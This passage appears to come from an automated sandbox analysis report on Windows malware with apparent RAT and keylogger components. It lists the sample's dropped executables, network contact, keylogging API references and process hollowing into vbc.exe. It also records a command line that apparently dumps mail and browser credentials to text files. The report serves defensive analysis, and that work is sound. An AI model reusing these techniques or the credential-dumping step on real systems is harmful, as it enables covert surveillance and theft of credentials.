Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy, 14_2_00403C3D
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: Tmp.exe.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Domain query: ia601504.us.archive.org
Source: C:\Windows\System32\wscript.exe Network Connect: 207.241.227.114 187 Jump to behavior
.NET source code references suspicious native API functions
Source: Tmp.exe.0.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: Tmp.exe.0.dr, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: servieda.exe.1.dr, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: servieda.exe.1.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 2.2.pgr.exe.80000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 2.0.pgr.exe.80000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe' Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.602209717.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp, Tmp.exe.0.dr Binary or memory string: Shell_TrayWnd
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp Binary or memory string: Progman
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp Binary or memory string: Program Manager|9kr
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp Binary or memory string: Shell_traywndnlp
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmp Binary or memory string: Shell_traywndG
Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp, servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmp Binary or memory string: Shell_traywnd8
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp Binary or memory string: Program Manager<
Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, Tmp.exe.0.dr Binary or memory string: Shell_traywnd

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
